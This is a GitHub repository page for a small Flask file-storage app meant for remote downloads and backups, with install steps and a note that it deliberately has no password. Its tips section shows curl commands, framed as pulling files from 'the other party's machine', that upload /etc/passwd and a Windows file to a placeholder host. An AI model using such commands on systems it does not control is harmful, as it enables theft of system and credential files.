Skip to content

基于flask layui的文件存储,远程下载

Notifications You must be signed in to change notification settings

mycve/webstorage

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

webstorage

基于python3 开发的flask的简单文件存储

用于远程下载、异地备份、私人网盘等

使用方法

1. git clone https://github.com/mycve/webstorage.git
2. cd webstorage
3. pip3 install -r requirements.txt
4. python3 app.py
5. 访问 https://ip:8899 (默认端口8899)

本着轻量级原则,未加密码等功能,私人用吧...

Tips:推荐部署到外企一家python runtime(:- ♥♥♥ because:forever free

Demo(是我已经部署好的,地址我就不放了)

image

小技巧(拖对方机器文件、快捷上传等):

curl https://xxxxx.com/api?action=upload -F "file=@/etc/passwd"
curl https://xxxxx.com/api?action=upload -F "file=@c://1.txt"

执行完了,回到网页刷新网盘 (:- over

About

基于flask layui的文件存储,远程下载

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published